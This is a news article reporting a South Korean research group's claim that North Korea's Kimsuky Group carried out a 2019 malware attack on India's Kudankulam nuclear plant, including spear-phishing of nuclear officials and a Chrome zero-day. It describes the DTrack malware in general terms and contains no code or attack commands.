Was North Korea Behind Attack at Indian Nuclear Power Plant?South Korean Researchers Claim Kimsuky Group Was Conducting Espionage
A nonprofit intelligence organization in South Korea claims that it has evidence that a recent malware attack at India’s Kundankulam Nuclear Power Plant was carried out by North Korea’s Kimsuky Group.
IssueMakersLab, or IML, a Seoul-based group of malware analysts, claims in a series of tweets that Kimsuky Group attempted to steal information on the latest design of the “Advanced Heavy Water Reactor,” an Indian design for a next-generation nuclear reactor that burns thorium into in the fuel core.
IML says it closely follows activities of various group from North Korea involved in nation-state attacks. And it claims the Kimsuky Group in 2013 used a similar method to attack South Korean broadcasting stations and banking systems.
The research group did not immediately reply to a request for more information on the evidence regarding the attack at the nuclear plant.
Simon Choi, IML's founder, said he will describe his group’s findings soon at a security conference soon. “We have been monitoring the hackers since 2008. We were also keeping a close watch on hackers who made the attack on India’s nuclear plant,” Choi says.
IML claims that the main motive behind the attack was to gain knowledge on thorium-based nuclear power.
“North Korea has been interested in the thorium based nuclear power, which can be used to replace the uranium nuclear power. India is a leader in thorium nuclear power technology. Since last year, North Korean hackers have continuously attempted to attack India’s nuclear plants to obtain that information,” IML says in a tweet.
Last week, the Nuclear Power Corp. of India confirmed that a PC at the Kudankulam Nuclear Power Plant was infected with malware.
The analysts at IML also claim that the accounts of many Indian nuclear scientists, including Anil Kakodkar, former Atomic Energy Commission chairman, and S.A. Bhardwaj, former chief of Atomic Energy Regulatory Board, were targeted for malware attacks.
“Hackers sent an email containing malware to the former chairman of the Atomic Energy Regulatory Board of India. He was also the technical director of Nuclear Power Corporation of India Limited as well as an expert on Advanced Heavy Water Reactor,” IML said.
The North Korean hackers sent hacking emails to the former chairman of the Atomic Energy Commission of India(AECI) and the Secretary to the Government of India and the Director of the Bhabha Atomic Research Centre(BARC). pic.twitter.com/UCv01aCq2X— IssueMakersLab (@issuemakerslab) November 2, 2019
Also, the DPRK hackers sent email containing malware to the chairman(not now *ex-*) of the Atomic Energy Regulatory Board(AERB) of India. And he was the Technical Director of Nuclear Power Corporation of India Limited(NPCIL). He's an expert on the AHWR reactor (thorium-based). pic.twitter.com/5BjlGenPhr— IssueMakersLab (@issuemakerslab) November 2, 2019
Nuclear Power Corp. of India did not immediately reply to a request for comment on the IML report.
IML also claims that those targeted by North Korean hackers are top authorities in India’s nuclear energy sector. If they stole their credentials, hackers could then contact anyone in India's nuclear energy sector and portray a trusted relationship, they note. The hackers used a computer produced and used only in North Korea, the researchers say. “The IP used by one of the hackers was from Pyongyang in North Korea,” IML says in a tweet.
How the Malware Was Launched
IML claims malware was injected into North Korea’s propaganda website, Meari, and distributed via the website by exploiting a Google Chrome zero day vulnerability.
This is Chrome 0-day script injected into the "메아리(Meari)" propaganda site by North Korea on October 29, 2019. pic.twitter.com/mKJuQJDTYm— IssueMakersLab (@issuemakerslab) November 2, 2019
According to a blog by Kaspersky, the exploit of Google Chrome’s zero day vulnerability began at a North Korean website where the attackers injected malicious code. This loads a script from a third-party site that first checks to see if the system is suitable for infection and which browser the victim uses. “After verifying it’s found what it wanted, the exploit gains permission to read and write data to the device, which it immediately utilizes to download, decrypt, and run the malware. The latter can vary depending on the user,” Kaspersky says.
The Kimsuky Group is believed to have been responsible for the Korea Hydro & Nuclear Power cyber terrorism attacks in 2014 in South Korea, according to The Guardian. The group uses spear-phishing emails, which are often designed with the purpose of stealing portal account information and attaching malicious code, according to news reports. The main targets of its attacks are government and military officials and news reporters.
DTrack, the malware that may have been used to infect a PC at the Indian nuclear power plant KKNPP, has historically used as an exfiltrate information tool. It’s essentially a remote access Trojan that takes control of a system, Kaspersky says.
IML says that the Kimsuky Group used DTrack to infiltrate the South Korean military's internal network in 2016 and steal classified information.
The Kimsuky Group has also targeted a wide range of entities, including diplomatic bodies of the United Nations Security Council like China, France, Belgium, Peru, and South Africa, The Guardian reports.